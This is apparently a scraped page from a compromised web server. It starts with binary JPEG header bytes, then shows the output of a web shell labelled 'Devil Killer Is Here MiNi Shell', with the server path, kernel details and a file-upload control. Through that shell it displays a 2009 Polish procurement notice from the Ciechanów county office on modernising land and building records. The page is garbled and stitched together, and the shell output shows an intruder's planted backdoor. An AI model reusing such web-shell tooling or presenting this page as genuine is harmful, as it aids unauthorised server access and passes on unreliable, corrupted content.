JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090820/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090820/137453-N-2009.html

<p class="kh_header"><b>Ciechanów: Modernizacja ewidencji gruntów i budynków. Założenie ewidencji budynków z aktualizacją użytków i ponowną gleboznawczą klasyfikacją gruntów dla części gminy CIECHANÓW - obręby: MODŁA WŁOŚCIAŃSKA, MODEŁKA, CHOTUM, BARAKI CHOTUMSKIE, RAJMUNDOWO, WOLA PAWŁOWSKA, GORYSZE, RYDZEWO, WÓLKA RYDZEWSKA, NOWA WIEŚ, RUTKI BORKI, RUTKI GŁOWICE, RUTKI BEGNY, RUTKI MARSZEWICE.
Zadanie  CIECHANÓW III</b><br>
<b>Numer ogłoszenia: 137453 - 2009; data zamieszczenia: 20.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starosta Ciechanowski , ul. 17 Stycznia 7, 06-400 Ciechanów, woj. mazowieckie, tel. 023 6723485, 6725415, faks 023 6722945.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ciechanow.powiat.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja ewidencji gruntów i budynków. Założenie ewidencji budynków z aktualizacją użytków i ponowną gleboznawczą klasyfikacją gruntów dla części gminy CIECHANÓW - obręby: MODŁA WŁOŚCIAŃSKA, MODEŁKA, CHOTUM, BARAKI CHOTUMSKIE, RAJMUNDOWO, WOLA PAWŁOWSKA, GORYSZE, RYDZEWO, WÓLKA RYDZEWSKA, NOWA WIEŚ, RUTKI BORKI, RUTKI GŁOWICE, RUTKI BEGNY, RUTKI MARSZEWICE.
Zadanie  CIECHANÓW III.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> A - Przedmiotem zamówienia jest:
      
1.	Założenie opisowych baz ewidencyjnych  budynków i lokali w w.w obrębach dla około 1570  obiektów.
2.	Aktualizacja użytków gruntowych i ponowna klasyfikacja użytków zmienionych w obszarze w obrębach: MODŁA WŁOŚCIAŃSKA, MODEŁKA, CHOTUM, BARAKI CHOTUMSKIE, RAJMUNDOWO, WOLA PAWŁOWSKA, GORYSZE, RYDZEWO, WÓLKA RYDZEWSKA, NOWA WIEŚ, RUTKI BORKI, RUTKI GŁOWICE, RUTKI BEGNY, RUTKI MARSZEWICE (patrz zał. Nr 3 - Projekt modernizacji - Charakterystyka obrębów),

        B. Charakterystyka obiektu.
 
        Szczegółowa charakterystyka obiektu zawarta  jest w zał. Nr 1i2 do Projektu
        Modernizacji  ewidencji gruntów i budynków części gm. CIECHANÓW 
        
        Podstawowe (w części danych szacunkowe) parametry ilościowe określające
        pracochłonność wykonania zadania to:
1.	pow. 14 obrębów wchodzących w skład opracowania        -    5301 ha,
2.	pow. użytków rolnych (R,S,Ps, Ł, BR, BŁ, BPs)                 -    3576 ha,
3.	pow. gruntów zabud. i zurb. (B, Ba, Bi, Bp, Bz, K, Dr, Tk. Ti ) -   86 ha,
4.	ilość działek                                                            -     3421 szt,
5.	ilość jednostek rejestrowych                                      -     1083 ha,
6.	szacunkowa ilość budynków i lokali w 14 obrębach         -     1570 ob,
a ponadto w zakresie ponownej klasyfikacji i aktualizacji użytków:
7.	ponowna klasyfikacja i aktualizacja zmienionych użytków w 14 obrębach szacowana na około 10 % pow. obrębów, tj. 
5301 ha x 10% = 530 ha 

W realizacji tego asortymentu prac należy korzystać z danych z opracowania dla systemu LPIS na bazie ortofotomapy. Dane te uzyskano na podstawie ortofotomapy opracowanej ze zdjęć lotniczych  z lat 2002-2003. Stopień zaufania do nieprzyjętego jeszcze do zasobu g-k opracowania winien być ostrożny i analityczny. Dane z ortofotomapy należy terenowo zweryfikować i wykorzystać jak podano w Projekcie modernizacji. 
8.	Opracowanie dokumentacji dla celów aktualizacji  operatu ewidencji gruntów i budynków ze względu na zmiany w treści użytków gruntowych i klas dotyczyłaby tych działek w obrębach, w których zaktualizowano użytki i ponownie sklasyfikowano. Będzie to powierzchnia jak w pkt 7.

          Szczegółowa charakterystyka obiektu i zakres ilościowy prac opisany w zał. nr  2 Charakterystyka obrębów.
           Zamawiający podając podstawowe wielkości obiektowe dotyczące szczególnie  aktualizacji użytków i ponownej klasyfikacji na terenach poza melioracyjnych decydujące o pracochłonności, a zatem i o kosztach opracowania, zastrzega się, iż dane te nie są precyzyjne i mają charakter wyłącznie orientacyjny i szacunkowy. Podane zostały przy założeniu, że 10 % terenów wymagać będzie aktualizacji użytków i ponownej klasyfikacji. Dane z opracowania LPIS-owskiego nakazują podejście do problemu wielkości prac w asortymencie  aktualizacja użytków z ponowną klasyfikacją użytków zmienionych z dużą ostrożnością. Dlatego rozliczenie nastąpi wg ilości faktycznie wykonanych prac aktualizacyjnych  i ich zakresu.
           Przedstawione dane szacunkowe mają  służyć przybliżonemu zorientowaniu się w ilości prac i ich zakresie co pozwoli oferentom na opracowanie  oferty wg podanych ilości i kosztów własnych jednostki. Pozwoli to również na porównywalność złożonych ofert.
           Brak możliwości precyzyjnego określenia danych w przypadku stwierdzenia różnic na etapie realizacji, nie może być podstawą roszczeń oferenta z tytułu wzrostu pracochłonności zamówienia, gdyż wynagrodzenie zostanie ustalone wg. ilości wykonanych jednostek rzeczowych. Zadanie dotyczy bowiem całości prac związanych  z założeniem ewidencji budynków i lokali oraz prac klasyfikacyjnych i aktualizacyjnych, które mogą wystąpić w granicach aktualizowanych obrębów zadania CIECHANÓW III.
            Wynagrodzenie za  wykonaną pracę nastąpi, wg oferowanych cen jednostkowych za poszczególny  asortyment prac wg ich zakresu  i rzeczywiście wykonanych jednostek rzeczowych  w każdym z asortymentów.
             Ponieważ aktualizacja i weryfikacja użytków jest asortymentem prac bardzo złożonym i różnorodnym co do zakresu, Zamawiający na podstawie zdobytych doświadczeń na innych obiektach, zdefiniował cztery standardy prac aktualizacyjnych, różniące się istotnie pomiędzy sobą zakresem, a zatem i wartością prac. Za modelowy zakres prac aktualizacyjnych należy uważać zespół  czynności geodezyjno-klasyfikacyjnych opisany szczegółowo na str 10 Projektu modernizacji, jako standard nr 1. Każdy z kolejnych standardów tj. 2, 3 i 4 różni się od standardu nr 1 tym, że albo nie potrzeba wykonywać ponownej klasyfikacji gleboznawczej lub nie ma potrzeby wykonywania pomiaru granicy zmienionego użytku albo obydwóch podstawowych czynności razem, a więc zakres prac jest odpowiednio mniejszy i posiada odpowiednio mniejszą wartość prac. 
               Biorąc to pod uwagę Zamawiający zwagował wartość każdego ze standardów odpowiednim współczynnikiem, który będzie wartościował prace aktualizacyjne przy rozliczaniu wartości prac z Wykonawca na etapie odbioru I Fazy i odbioru końcowego.
               Szczegółowy opis standardów i współczynników wartościujących zawiera uzgodniony przez WINGK-a Projekt modernizacji  na stronach 10-12. 

             Załącznikiem do opisu przedmiotu zamówienia jest mapa 1:100 000 zadania CIECHANÓW III z zaznaczonymi co do lokalizacji obrębami - zał. nr 1.





     C. Zakres prac
został szczegółowo określony w cz. II Projektu   modernizacji pt. Zakres prac dla:
A. Założenia ewidencji budynków i lokali - cz. II pkt. A,
B. Ponownej gleboznawczej klasyfikacji gruntów i aktualizacji oraz weryfikacji
      użytków- cz. II pkt. B,
       Uwaga!
1)	Zamawiający oczekuje osiągnięcia po aktualizacji baz dalszej, pełnej integracji funkcjonujących pod EWOPISEM numerycznych baz opisowych ewidencji gruntów, z istniejącą numeryczną bazą mapy ewidencyjnej pod EWMAPĄ. W trakcie opracowania bazy klasoużytków , wykonawca jako źródło informacji o rodzajach i granicach użytków i klas bonitacyjnych wykorzysta dane z opracowania LPIS-u i własne dane  pomiarowe i klasyfikacyjne, a także  wykazy  współrzędnych granic zmienionych użytków,  czystorys mapy klasyfikacyjnej opracowany na podstawie przeprowadzonej w trakcie niniejszego zadania zatwierdzonej ponownej klasyfikacji gruntów i aktualizacji użytków wymienionych obrębów. Opracowane raporty podstawowe i pomocnicze mają odzwierciedlać wyniki założenia ewidencji budynków i lokali oraz  wyniki klasyfikacji i aktualizacji użytków. Całość opracowania musi być zgodna z wymogami Rozporządzenia  MRRiB z 29.03.2001 r. w/s ewidencji gruntów i budynków i instrukcji G5.
Bazę opisową ewidencji gruntów i budynków należy wykonać wg struktury określonej  Rozporządzeniem ( jednostki rejestrowe, podgrupy, grupy). Pod wskazaną aplikacją EWOPIS WIN  w aktualnej wersji 4.0 i w pełnej zgodności z zał. Nr 4 zaktualizowanym w roku 2002 i 2003 przez Główny Urząd Geodezji i Kartografii.
            Wskazanym jest by bazę graficzną egib  wykonać pod aplikacją EWMAPA 9.0 wg. rozwarstwienia przyjętego w powiecie ciechanowskim dla mapy zasadniczej. Bazy muszą posiadać możliwość  konwersji do postaci SWDE.
Dodatkowych uzgodnień ze Starostą na etapie tworzenia warunków technicznych wymagać będzie budowa struktury identyfikatorów poszczególnych typów obiektów. Generalnie należy stosować strukturę identyfikatorów jaką zastosowano dotychczas w opracowanej mapie cyfrowej w naszym powiecie.
      2) Zamawiający oczekiwał będzie szczególnie wnikliwego i pełnego skompletowania dokumentacji techniczno-prawnej opracowania z aktualizacji operatu ewidencyjnego bowiem będzie to oparta na nowych źródłach pozyskania dokumentacja bazowa w części założenia ewidencji budynków i lokali oraz w części użytków i klas dla każdego z obrębów. Skład operatu klasyfikacyjnego, geodezyjnego - prawnego oraz opisowo-kartograficznego zaproponuje Wykonawca w przedstawionych przez siebie i uzgodnionych z Zamawiającym Warunkach Technicznych, w zgodności z Projektem modernizacji.
      3). Dla każdego z obrębów, zostanie wszczęte i toczyć się będzie jedno postępowanie  w sprawie ponownej klasyfikacji gruntów i zmiany rodzaju użytków. Stąd też dokumentacja opracowana przez jednostkę wykonawstwa geodezyjnego przekazywana do Starosty  celem wyłożenia i wydania decyzji administracyjnej w przedmiotowej sprawie , winna być skompletowana odrębnie dla obrębu w postaci operatu klasyfikacyjnego zawierającego zakres B omówione w części II Projektu modernizacji, wraz z czystorysem mapy klasyfikacyjnej 1:2000, która na etapie aktualizacji ewidencji gruntów obrębu  stanowić będzie bazowe źródło danych dla opracowania numerycznej warstwy klasoużytków jako składnika mapy ewidencji.
           Dane z pomiaru uzupełniającego granic użytków i granic klas bonitacyjnych wraz z bazą współrzędnych granic użytków  i klas służące do aktualizacji części opisowej i graficznej operatu egib winny być składnikiem zasobu bazowego operatu geodezyjno-prawnego każdego z obrębów łącznie z danymi z pomiaru             uzupełniającego budynków ( etap 6 - pkt VI Projektu)..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 93.00.00.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Oferenci są zobowiązani do wniesienia wadium w wysokości 4000 zł ( słownie:
cztery tysiące złotych)  najpóźniej w  terminie określonym do składania ofert tj.
do 31 sierpnia 2009 r. do godz. 10:00.
          Wadium może być wniesione do kasy Starostwa Powiatowego Ciechanowie przy  ul. 17 Stycznia 7, pok. 123 lub wpłacone na rachunek bankowy na konto sum 
depozytowych  nr 32821300082001000526630007 Starostwa Powiatowego 
w Ciechanowie BS Ciechanów  z opisem Modernizacja ewidencji gruntów -
           Ciechanów III.
           Zwrot wadium nastąpi gdy:
a) upłynął termin związania z ofertą 
b) zawarto umowę w sprawie zamówienia publicznego
c) zamawiający unieważni postępowanie o udzielnie zamówienia
d) na wniosek oferenta  jeżeli:
- wycofał ofertę przed upływem terminu składania ofert;
- został wykluczony z postępowania;
- oferta oferenta została odrzucona
e) zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli oferent, którego oferta
     została wybrana:
   - odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach
   określonych w ofercie
   - zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie oferenta.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Do przetargu mogą przystąpić podmioty spełniające warunki określone w art. 22 ust. 1 pkt 1-4 tj.
      1/  posiadające uprawnienia do wykonywania określonej działalności lub czynności,
      2/  posiadające niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym, osobami zdolnymi do wykonywania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia  ,
      3/ znajdujące się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie  zamówienia ,
      4/ nie podlegające  wykluczeniu na podst. art.24 prawa zamówień publicznych,                                                                                                    a ponadto  
          sporządzą ważną ofertę zgodną z SIWZ dla przedmiotowego zadania oraz złożą  niezbędne załączniki, oświadczenia  i dokumenty dowodzące spełnienia postawionych warunków.

      Za spełnienie    
1)	Kryterium uprawnień do wykonywania działalności zamawiający uważał będzie za udowodnione, jeśli prowadzenie działalności gospodarczej w dziedzinie geodezji lub klasyfikacji gruntów przez podmiot w rozumieniu Kodeksu Spółek Handlowych 
(Dz. U. z 2000 r. Nr 94, poz. 1037 ze zm.) lub Kodeksu Cywilnego przez składającego ofertę wykonania zamówienia i jego partnerów gospodarczych, odbywa się  w ramach ustawy z dnia 2 lipca 2004 r. o swobodzie działalności gospodarczej (Dz. U. Nr 173, poz. 1807 ze  zm).

2)	Kryterium wiedzy i doświadczenia oraz potencjału technicznego zamawiający uważał będzie za udowodnione jeżeli :
       a) prowadzenie działalności gospodarczej w dziedzinie geodezji zachodziło przez okres co najmniej pięciu  lat przez oferenta lub poprzednią jednostkę dla której  oferent jest  następcą prawnym i zachowana została ciągłość kadrowa.
          Doświadczenie uważane będzie za udowodnione jeżeli oferent udowodni się
          założeniem, odnowieniem :
-	w zakresie ewidencji gruntów: założeniem , odnowieniem, modernizacją lub aktualizacją ewidencji gruntów w formie numerycznej dla co najmniej trzech obrębów o powierzchni ponad 300 ha i ponad 200 działek każdy lub co najmniej jednego obrębu, gdzie zaewidencjonowano  ponad 600 budynków i lokali zrealizowanych  w ciągu  ostatnich 5 lat ( lub 10-ciu z udowodnieniem ciągłości z tytułu uznania poprzednika prawnego),
-	W zakresie klasyfikacji : jeśli podmiot gospodarczy , który będzie wykonywał prace klasyfikacyjne udowodni  wykonanie co najmniej 400 ha (łącznie) prac klasyfikacji gruntów lub aktualizacji użytków pod rządami Rozporządzenia  RM z 04-06-1956 r w/s klasyfikacji gruntów oraz Zarządzenia nr 127 Min. Rol. z 14 czerwca 1956 r w/s zasad i metod technicznego wykonania klasyfikacji gruntów oraz posiadanie wymaganych kwalifikacji gruntów w okresie obowiązywania w/w przepisów prawnych . Klasyfikatorzy przeprowadzający klasyfikację  muszą wylegitymować się również wpisem na listę jednego z Wojewódzkich Inspektorów Nadzoru Geodezyjnego i Kartograficznego, a inspektor  nadzoru klasyfikacyjnego musi  być wpisany na listę WINGK w Warszawie.

 b) posiadanie potencjału technicznego uznane będzie za spełnione jeśli oferent
 udowodni posiadanie co najmniej dwóch zestawów sprzętu geodezyjnego , dwóch
 zestawów sprzętu komputerowego i oprogramowania  gwarantującego opracowanie zbiorów głównych i pomocniczych oraz numerycznej mapy ewidencyjnej  wymaganej jakości opracowania.
c)  dysponowanie osobami zdolnymi do wykonania zamówienia będzie spełnione
      jeśli:
A. w przypadku, gdy oferentem będzie podmiot prowadzący działalność w zakresie
    geodezji
-   w jednostce oferenta zatrudnione są co najmniej dwie osoby z wykształceniem
    geodezyjnym wyższym będące właścicielami , wspólnikami lub pracownikami
    zatrudnionymi na czas nieokreślony , z których co najmniej jeden posiada
     uprawnienia w zakresie 1 i 2 oraz na czas nieokreślony zatrudnione są dalsze trzy  osoby z wykształceniem geodezyjnym, budowlanym lub prawniczym, z których co  najmniej  jedna posiada uprawnienia 1, 2
-   w jednostce oferenta zatrudniony jest na czas nieokreślony co najmniej jeden
     klasyfikator posiadający uprawnienia do wykonywania klasyfikacji gruntów
     wymienionych w pkt V-2a lub jeśli oferent takiego specjalisty nie zatrudnia ale
     przedstawi warunkową umowę cywilno-prawną (o dzieło , zlecenia) , na 
     wykonanie klasyfikacji i aktualizacji użytków na obręby będące przedmiotem 
     przetargu zawartą pomiędzy oferentem ,  a podmiotem prowadzącym 
    działalność w zakresie klasyfikacji, gdzie co najmniej zatrudniony jest jeden 
    klasyfikator wpisany na listę WINGK-ów, 
-    wskaże osobę inspektora nadzoru działającego na zlecenie oferenta , w zakresie
      kontroli  prac klasyfikacyjnych, wpisanego na listę WINGK Woj. Mazowieckiego ,
      z którym zawarto umowę warunkową o nadzór prac klasyfikacyjnych ,
-    nadzór nad pracami geodezyjnymi zapewnia Zamawiający.
    
         B. W przypadku, gdy oferentem będzie podmiot prowadzący działalność w zakresie  klasyfikacji gruntów.
-    w jednostce oferenta zatrudniony jest co najmniej jeden klasyfikator posiadający udowodnione kwalifikacje i udowadniający stosownym doświadczeniem w dziedzinie klasyfikacji gruntów, wpisany na listę klasyfikatorów WING-ów, będący
właścicielem, wspólnikiem s-ki lub zatrudnionym na czas nieokreślony pracownikiem,
   -    w jednostce oferenta zatrudnionych na na czas nieokreślony 3 geodetów, z których co najmniej dwóch posiada uprawnienia w zakresie 1 i 2 lub jeśli oferent z obszaru  klasyfikacji gruntów przedstawi stosowną umowę cywilno-prawną (zlecenia, o dzieło) o charakterze warunkowym na wykonanie prac geodezyjnych związanych z wykonaniem przedmiotu przetargu, z podmiotem prowadzącym działalność w  zakresie geodezji, zatrudniającym co najmniej trzech geodetów w tym dwóch z wykształceniem wyższym, gdzie co najmniej dwie osoby z wymienionej
trójki posiadają uprawnienia w zakresie geodezji nr 1 i 2,
      -   wskaże osobę inspektora nadzoru wpisanego na listę WINGK Woj.
          Mazowieckiego działającego na zlecenie oferenta w zakresie kontroli prac
          klasyfikacyjnych, z którym zawarto stosowną warunkową umowę na 
          wykonanie  kontroli prawidłowości wykonania klasyfikacji gruntów,
-  nadzór nad pracami geodezyjnymi zapewnia Zamawiający.
3) Kryterium sytuacji  finansowej zapewniającej wykonanie zamówienia - uważane
 będzie przez zamawiającego za spełnione jeśli oferent przedstawi dowody na to , że :
a)	- nie zalega w płaceniu podatków
b)	- nie jest dłużnikiem ZUS-u w płaceniu opłat na obowiązkowe świadczenia
               społeczne i zdrowotne
c)	- wykażą , że sytuacja ekonomiczna finansowa pozwala na 
               zaangażowanie środków własnych w wysokości 80% wartości 
               zamówienia do czasu ostatecznego odbioru i rozliczenia I fazy zadania

4)           Kryterium nie podlegania wykluczeniu z postępowania o udzielenie 
             zamówienia będzie uważane za spełnione , jeśli nie zaistniała wobec 
             oferenta jakakolwiek z osobna, czy łącznie przesłanka  wykluczenia 
             określona w art. 24 ust. 1 i 2 prawa o zamówieniach publicznych
    Z postępowania o udzielenie zamówienia wyklucza się:
1)	wykonawców, którzy w ciągu ostatnich 3 lat przed wszczęciem postępowania wyrządzili szkodę  nie wykonując zamówienia lub wykonując je nienależycie, a szkoda ta nie została dobrowolnie naprawiona do dnia wszczęcia postępowania, chyba że niewykonanie lub nienależyte wykonanie jest następstwem okoliczności, za które wykonawca nie ponosi odpowiedzialności;
2)	wykonawców, w stosunku do których otwarto likwidację lub których upadłość ogłoszono, z wyjątkiem wykonawców, którzy po ogłoszeniu upadłości zawarli układ zatwierdzony prawomocnym postanowieniem sądu, jeżeli układ nie przewiduje zaspokojenia wierzycieli poprzez likwidację majątku upadłego;
3)	wykonawców, którzy zalegają z uiszczeniem podatków, opłat lub składek na ubezpieczenia społeczne lub zdrowotne, z wyjątkiem przypadków gdy uzyskali oni przewidziane prawem zwolnienie, odroczenie, rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
4)	osoby fizyczne, które prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem  o udzielenie  zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo  udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego;
5)	spółki jawne, których wspólnika prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub   przestępstwo udziału w zorganizowanej grupie albo związku mających  na celu popełnienie przestępstwa lub przestępstwa skarbowego;
6)	spółki partnerskie, których partnera lub członka zarządu prawomocnie skazano za przestępstwo popełnione w związku postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe  lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego;
7)	spółki komandytowe oraz spółki komandytowo-akcyjne, których komplementariusza prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także  za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego;
8)	osoby prawne, których urzędującego członka organu zarządzającego prawomocnie skazano za przestępstwo popełnione w związku  z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku    mających na celu popełnienie przestępstwa lub przestępstwa skarbowego;
9)	podmioty zbiorowe, wobec których sąd orzekł zakaz ubiegania się o zamówienia, na podstawie przepisów o odpowiedzialności podmiotów zbiorowych za czyny zabronione po groźbą kary;
10)	wykonawców, którzy nie spełniają warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 1-3.

Z postępowania o udzielenie zamówienia wyklucza się również wykonawców, którzy:
1)	wykonywali bezpośrednio  czynności związane z przygotowaniem prowadzonego postępowania lub posługiwali  się w celu sporządzenia oferty osobami uczestniczącymi w dokonywaniu tych czynności, chyba że udział tych wykonawców w postępowaniu  nie utrudni uczciwej konkurencji; przepisu nie stosuje się do wykonawców, którym udziela się zamówienia na podstawie art. 62 ust. 1 pkt 2 lub art. 67 ust. 1 pkt 1 i 2;
2)	złożyli nieprawdziwe informacje mające wpływ na wynik prowadzonego postępowania;
